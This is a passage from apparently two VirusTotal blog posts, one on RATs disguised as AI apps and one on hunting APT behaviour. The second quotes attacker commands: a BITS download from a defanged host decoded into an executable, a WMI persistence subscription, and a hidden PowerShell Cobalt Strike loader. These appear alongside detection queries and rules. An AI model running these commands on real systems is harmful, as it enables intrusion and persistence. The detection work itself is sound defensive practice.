color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai </span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">in</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> malware_AI_hashes<br /></span></i><i><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">if</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai[</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'attributes'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">][</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'last_analysis_stats'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">][</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'malicious'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">] > </span><span style="background-color: transparent; color: #116644; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> ]<br /></span></i><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><i>)</i></span></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><i><span id="docs-internal-guid-87f14b3e-7fff-d849-44b4-af7f4bce17e4"></span></i></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt;">We can easily modify this script to obtain the files ('Communicating Files') that interact with the 'api.openai.com' domain.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span><br /></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span id="docs-internal-guid-5a8f444f-7fff-8a36-2f02-06bd9b0bb20c"></span></p><h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">RAT in the chat</span></h4><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">As previously mentioned, we found several RAT samples mimicking AI applications (Google Bard, OpenAI Chat-GPT). Some DarkComet samples use 'https://api.openai.com/v1/completions', which according to </span><a href="https://platform.openai.com/docs/api-reference/completions/object" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">OpenAI’s documentation</span></a><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, can be used to prompt Chat-GPT. This endpoint requires an API key.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><a href="https://www.virustotal.com/gui/file/3029654bf524854b2be6403e881b764552ac2578360c2d00f960e98dc5aae52d/detection" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">One of these samples</span></a><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, with 42 AV detections, included this URL although it did not connect to openai.com during sandbox execution, so we took a deeper look.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The first disassembled instructions show the 'krnln.fnr' string and the registry entry "Software\FlySky\E\Install", that refers to </span><a href="https://en.wikipedia.org/wiki/Easy_Programming_Language#:~:text=Easy%20Programming%20Language%20(EPL%2C%20Chinese,features%20a%20full%20Chinese%20environment." style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">EPL</span></a><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (Easy Programming Language). </span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">EPL provides functionality similar to Visual Basic. This </span><a href="https://www.hexacorn.com/blog/2019/02/13/pe-files-and-the-easy-programming-language-epl/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">blog post</span></a><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (@Hexacorn) provides more information on how to analyze these files.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy5c1HZ-GuaiEBnSXHstn5EgOH9a5VNGtuSHS3PAToF5F0EEaKU2yy056rS7hQevys4czLPKjMfub8zh2Zsxv9nr2ZQG1SGBe0vwjldAkrjtmXd3uFBu2smKiXhLp6U2Z_qgQkNWiICf2xIgI_bneNjnUcuW7yEDl-2h32pXY03Kd6iCVarI30B3OxboQ/s1496/Screenshot%202023-11-29%20at%2009.14.39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1120" data-original-width="1496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy5c1HZ-GuaiEBnSXHstn5EgOH9a5VNGtuSHS3PAToF5F0EEaKU2yy056rS7hQevys4czLPKjMfub8zh2Zsxv9nr2ZQG1SGBe0vwjldAkrjtmXd3uFBu2smKiXhLp6U2Z_qgQkNWiICf2xIgI_bneNjnUcuW7yEDl-2h32pXY03Kd6iCVarI30B3OxboQ/s16000/Screenshot%202023-11-29%20at%2009.14.39.png" /></a></div><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span id="docs-internal-guid-ba1d18bb-7fff-4b63-f09e-6c82e3e2bb48"></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">If this framework is installed on the victim's computer, the sample opens a window for the victim to interact with Chat-GPT with a 'How are you?' in Chinese.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmRKdvlN1e7CJq-TM_IFTU1bB3San1pXgTHsSK1_efqB5Vq7RbXnqxXD66Z1ryzm6DK63msWqgh4BcJOyhe32uTJzyXwaLhgnCrVwzBbVm6bZMd8IYU9CNeTXx1xhDCzhRB2GXL-L_kP_u2hE8TStx5opA_DS5GEAvua4xIR1cdllTSGoSt-w3nnMS9NI/s1878/Screenshot%202023-11-29%20at%2009.15.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="262" data-original-width="1878" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmRKdvlN1e7CJq-TM_IFTU1bB3San1pXgTHsSK1_efqB5Vq7RbXnqxXD66Z1ryzm6DK63msWqgh4BcJOyhe32uTJzyXwaLhgnCrVwzBbVm6bZMd8IYU9CNeTXx1xhDCzhRB2GXL-L_kP_u2hE8TStx5opA_DS5GEAvua4xIR1cdllTSGoSt-w3nnMS9NI/s16000/Screenshot%202023-11-29%20at%2009.15.14.png" /></a></div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></p>This file appears in the resource segment of another PE file. This parent file is a RAT that </span><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">executes the previous chatbot.</span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRfh4sFZ1uwaL94qOXHx0xD0H2SkY6R6fQWIdAUKrxDer2rOCQcKY-lPrS3iqr5WvELhfTb_p8KCERZnyWz-DY3FLpr6BgdgYb4RHBE76UZzsDpQHnFNZw7unk0MbGihmfIghtsuFnw1yLFDzg_-LVaAJm3RmQk3dB64A0M7onqPuy6a3O8yb3z4PfBE/s1876/Screenshot%202023-11-29%20at%2009.23.32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="230" data-original-width="1876" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRfh4sFZ1uwaL94qOXHx0xD0H2SkY6R6fQWIdAUKrxDer2rOCQcKY-lPrS3iqr5WvELhfTb_p8KCERZnyWz-DY3FLpr6BgdgYb4RHBE76UZzsDpQHnFNZw7unk0MbGihmfIghtsuFnw1yLFDzg_-LVaAJm3RmQk3dB64A0M7onqPuy6a3O8yb3z4PfBE/s16000/Screenshot%202023-11-29%20at%2009.23.32.png" /></a></div><br /><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span id="docs-internal-guid-5b5ea83b-7fff-9150-0073-a0ed6c5080aa"></span></span></p><h4 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Wrapping it up</span></h4><div style="text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></div><div style="text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 18pt; padding: 0pt 0pt 18pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The integration of AI engines into VirusTotal has provided a unique opportunity to evaluate their capabilities in real-world scenarios. While the field is still rapidly evolving, AI engines have demonstrated remarkable potential for automating and enhancing various analysis tasks, particularly those that are time-consuming and challenging, such as deobfuscation and interpreting suspicious behavior.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 18pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Pinpointing whether malware is AI-generated remains a complex task due to the difficulty of tracing the origins of source code. Instead, we've encountered malware families employing AI themes for distribution, exploiting the current trend of AI-based threats. This opportunistic behavior is unsurprising, given attackers' tendency to capitalize on trending topics. The majority of these disguised samples are trojans targeting Windows systems, followed by Android samples. </span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 18pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">While the integration of OpenAI APIs into certain RATs has been observed, the specific purpose and effectiveness of this integration remain unclear. It appears that RAT operators may be utilizing OpenAI APIs as a distraction tactic rather than leveraging their full potential for advanced malicious activities. Nonetheless, it is imperative to maintain vigilance and closely monitor how the usage of OpenAI APIs in RATs might evolve in the future.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">As always, we would like to </span><a href="http://virustotal.com/contact" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">hear</span></a><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> from you.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Happy hunting!</span></p></span></div></span></span></div></span></span></div></span></div></span>Vicente Díazhttp://www.blogger.com/profile/11514421601563728512noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-1034039350643288532023-11-23T11:04:00.003+01:002023-11-23T17:30:11.089+01:00Actionable Threat Intel (VI) - A day in a Threat Hunter's life<div class="interval_12">Kaspersky's CTI analysts recently released their <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf" target="_blank"> Asian APT groups</a> report, including details on behavior by different adversaries. Following our <a href="https://blog.virustotal.com/2023/10/the-path-from-vt-intelligence-queries.html" target="_blank">series</a> on making third-party intelligence actionable using VirusTotal Intelligence, we have put on our threat hunter’s hat to find samples and monitor activity based on the report’s details.
</div>
<div class="interval_12">Many of the behaviors shared by Kaspersky are based on the use of <a href="https://lolbas-project.github.io/" target="_blank">LOLBAS</a> by attackers once the set foothold on the victim. This is an increasing trend by adversaries, which makes it critical for security analysts to understand these binaries’ capabilities.
</div>
<div class="interval_12">Let’s start by analyzing the most interesting bits we found in the report.
</div>
<h2 style="text-align: left;">Start-BitsTransfer </h2>
<div class="interval_12">Start-BitsTransfer is a <a href="https://learn.microsoft.com/en-us/powershell/scripting/developer/cmdlet/cmdlet-overview?view=powershell-7.3" target="_blank">cmdlet</a> that <a href="https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps" target="_blank">supports</a> the download of multiple files, which seems to be an alternative for adversaries to the most commonly used bitsadmin.exe binary. The report describes its use in different cases, here we can find one example:
</div>
<div class="my-yara-code interval_12">
PowerShell "Start-BitsTransfer -Source hxxp://security.lomiasecure[.]net/crx/node.txt -Destination C:\\Users\\public\\node.txt -transfertype download" PowerShell if($InputString = Get-Content 'C:\\users\\public\\node.txt'){ [System.IO.File]::WriteAllBytes('C:\\users\\public\\node.exe', [System.Convert]::FromBase64String($InputString))}
</div>
<div class="interval_12">The example uses FromBase64String and WriteAllBytes, so our query will look for either of them using an OR condition, as well as for the presence of the "Start-BitsTransfer" cmdlet in sandbox’s behavior. The following VT intelligence query obtains samples with similar (not identical) behaviors.
</div>
<div class="my-yara-code interval_12">
<mark class="red">behavior_processes:</mark>"Start-BitsTransfer -Source" (<mark class="red">behavior_processes:</mark>"[System.Convert]::FromBase64String" or <mark class="red">behavior_processes:</mark>"[System.IO.File]::WriteAllBytes")</div>
<div class="interval_12">The <a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522Start-BitsTransfer%2520-Source%2522%2520(behavior_processes%253A%2522%255BSystem.Convert%255D%253A%253AFromBase64String%2522%2520or%2520behavior_processes%253A%2522%255BSystem.IO.File%255D%253A%253AWriteAllBytes%2522)/files" target="_blank">query</a> returns 12 suspicious samples. Activity seems to be clustered around October and November 2023. Some of the results are related, according to OSINT, to <a href="https://www.virustotal.com/gui/file/6b3aeeb01a2eaa36fdbfb6c07a86ffd7db6088c06662353812ab7b1a591d8078/details" target="_blank">APT33</a> and <a href="https://www.virustotal.com/gui/file/ff4b378d5e1de2232ab00a1262a3c848090f42538178c22366a3446c182b5957/details" target="_blank">The Gorgon Group:</a>
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/nSXQDfIQJS4jZqhVL8GiqJJ2A-qysaRV_SKmSlYAmLR8ShgZ3HUD0u6NRgu3eRkAtCqxi5NE0j_PWlXzsKhS47j9pZKIf5GvLCMRddTl-y0flPVUmx832she7hvX_ZdfaKr-gxbS0fWUnr112Hxl-t9NfMBkaGfIsDQYGVkjMIKagNPxEGUi5x1Ep_Q0Spg" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<h2 style="text-align: left;">WMI Event Subscription</h2>
<div class="interval_12">This technique is used by threat actors during lateral movement mainly for execution and persistence. To achieve this the WMI event subscription points to the payload to execute.
</div>
<div class="my-yara-code interval_12">
instance of __EventFilter { EventNamespace = "root\\cimv2"; Name = "Chrome Update"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=240 AND TargetInstance.SystemUpTime < 325"; QueryLanguage = "WQL"; };
</div>
<div class="my-yara-code interval_12">
instance of CommandLineEventConsumer { ExecutablePath = "C:\\Windows\\System32\\GoogleUpdate.exe"; Name = "GoogleUpdater"; };
</div>
<div class="interval_12">There are different ways to search in VirusTotal for samples with this behavior. In this case, we identified the use of "ExecutablePath" instead of "CommandLineTemplate" to specify the path to the payload, which is the more common method. When “CommandLineTemplate” is null, the value of “ExecutablePath” is used instead. Then the process is executed by calling the “CreateProcess” API. The following VTI <a href="https://www.virustotal.com/gui/search/(behavior_processes%253A%2522EventNamespace%2520%253D%2522)%2520(behavior_processes%253A%2522Name%2520%253D%2522)%2520behavior_processes%253A%2522QueryLanguage%2520%253D%2520%255C%2522WQL%255C%2522%2522%2520(behavior_processes%253A%2522__EventFilter%2522%2520behavior_processes%253A%2522CommandLineEventConsumer%2522)%2520behavior_processes%253A%2522ExecutablePath%2520%253D%2522/files" target="_blank">query</a> is based on this finding:
</div>
<div class="my-yara-code interval_12">
(<mark class="red">behavior:</mark>"EventNamespace =") (<mark class="red">behavior:</mark>"Name =") <mark class="red">behavior:</mark>"QueryLanguage = \"WQL\"" (<mark class="red">behavior:</mark>"__EventFilter" <mark class="red">behavior:</mark>"CommandLineEventConsumer") <mark class="red">behavior:</mark>"ExecutablePath ="
</div>
<div class="interval_12">This query returns 41 results, including <a href="https://www.virustotal.com/gui/file/df47a0fe2ce6a7ec51249d641a36ae48da6623ece0056cfb5f381bf62a62c5d0/details" target="_blank">Konni</a> malware samples and samples attributed to APT37. As a confirmation to our previous assumption, using “<mark class="red">CommandLineTemplate =</mark>” instead of “<mark class="red">ExecutablePath =</mark>” returns 1.1k samples.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WREsZALUNzganRM3BQ7RkAf_5YK4UgGuCHcBUfPzwugaXuw5bMs9LyTSzjaP4baArN2BdzNwhNfu1A8IF2e8reYLL78fpwqIEmc77YPClaFTCZzBF_H0CgDCfDi3WJWOZTbR25GPUoJsQxaIADPvs951MahPzCdRmO8k6YH6QqzvREcbTrmjJil4YwHhO-o" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">Please note the use of "behavior" instead of "behavior_processes" in the previous VTI query. The reason is WMI statements are commonly stored in the "Dataset actions", "Highlighted Text" and "Calls Highlighted" sections under the sample’s behavior. This is because WMI events do not launch new processes, as they are processed by a ETW provider, resulting in these events being mapped under “behavior” by the sandbox. <a href="https://www.virustotal.com/gui/file/fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2/behavior" target="_blank">Here</a> you can find an example.
</div>
<div class="interval_12">Another interesting way to hunt and monitor samples using this technique is through the following crowdsourced <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" target="_blank">sigma rule</a>, which checks for WMI event subscriptions.
</div>
<div class="my-yara-code interval_12">
<mark class="red">sigma_rule:</mark>07b95c7eb376ac65a345dc6a2c1cb03732e085818d93bd1ea2e7d3706619d78e
</div>
<h2 style="text-align: left;">PowerShell capabilities</h2>
<div class="interval_12">Not surprisingly, PowerShell is one of the most used scripting languages by attackers. In particular, the following code injects Cobalt Strike in binary form into memory.
</div>
<div class="my-yara-code interval_12">
С:\Windows\system32\cmd.exe /b /c start /b /min PowerShell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+ '\sysnative\WindowsPowerShell\v1.0\PowerShell.exe'}else{$b='PowerShell.exe'};$s=NewObject System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System. Convert]::FromBase64String(''H4sIAIKCBWACA7VWa2+ bSBT9nEj5D6iyZFAcP5I0bSJVWsY2McR2jYlxbK+1IjDA1MMjMDgm3f73vYMhTbdp.... '))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))'; $s.UseShellExecute=$false;$s.RedirectStandardOutput=$true; $s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
</div>
<div class="interval_12">From the previous PowerShell, it is possible to create a <a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522%257B%2524b%253D'PowerShell.exe'%257D%2522%2520behavior_processes%253A%2522-nop%2520-w%2520hidden%2520-noni%2520-c%2522%2520behavior_processes%253A%2522%257B%2524b%253D%2524env%253Awindir%252B%2522/files" target="_blank">query</a> to detect patterns using the same memory injection technique. The resulting samples seem to mostly use it to inject Metasploit.
</div>
<div class="my-yara-code interval_12">
<mark class="red">behavior_processes</mark>:"{$b='PowerShell.exe'}" <mark class="red">behavior_processes</mark>:"-nop -w hidden -noni -c" <mark class="red">behavior_processes</mark>:"{$b=$env:windir+"
</div>
<div class="interval_12">From the previous query, half of the results correspond to metasploit samples, mainly “.bat” scripts that aim to execute “cmd.exe” to launch PowerShell, and finally, load in memory the payload in binary form.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/btWqGpYl30yKtTCB9S4qMW9XJSkst5gYXPZvLZOeWDF0S0RRiKkQQpsMoaOEbxQdHZIe0qdi3ghGQ3psiG9v1yOZf3V-7ZYN3Hw5kHoj1sB8X17qbqW6yS__frkglybtocg3Ll7OdUa1gYei2fZVsCNLUsYY1Q2A8Uh8-l7izPsbPEtw-Ux3DL4yc6vZnpA" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">41 out of 44 results are identified by the same sigma rule “Powershell Decrypt And Execute Base64 Data”, created by Joe Security. We can search additional identified samples by this crowdsourced rule with the VTI following query.
</div>
<div class="my-yara-code interval_12">
<mark class="red">sigma_rule:</mark>d77da6b7c1a6f6530b4eb82ca84407ff02947b235ab29c94eade944c4f51e499
</div>
<h2 style="text-align: left;">Automate your queries 🚀</h2>
<div class="interval_12">The previous are simple examples on how a CTI team could consume tactical intelligence for hunting. Once assessed the efficacy of the VTI queries, it's time to convert them into VT Livehunt rules to automatically monitor any suspicious future activity. VTI queries can be easily translated into YARA rules, used by Livehunt, thanks to the “vt” module. Let’s see how.
</div>
<div class="interval_12"><u><b>Start-BitsTransfer</b></u> </div>
<div class="interval_12">The Livehunt YARA rule resulting from our previous VTI query will automatically monitor and notify us with any new samples using the Start-BitsTransfer cmdlet technique previously discussed. This is usually used either through a script or directly on the command line interpreter.
</div>
<div class="interval_12">In our YARA, we use different fields like “terminated processes”, “executed commands” or “created processes” to look for the use of “Star-BitsTransfer”. Then we search in processes created, terminated and command executions for traces of the “FromBase64” and “System.IO.File” strings, also needed for this technique. Finally, we added the “new file” modifier at the beginning to receive notifications only for fresh new uploads.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/AShXanqRuODtxpm0NK2YxrQk4q9SQtcKfKH1hJ2kEmUfZ7EbZ_TsSTJAIF4RUx1n0PfEG6xofRE2D6h6WeAKnGkRz40tiXa0AQhmQLpZ-zIFAeENTJLzy9thl0TD2J8OZ-XoVHmxTzwkJ1D7BhLATL68cFUOluf9o2qLMJKoYeANEXW6EEVEL2p5DfHyLSo" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
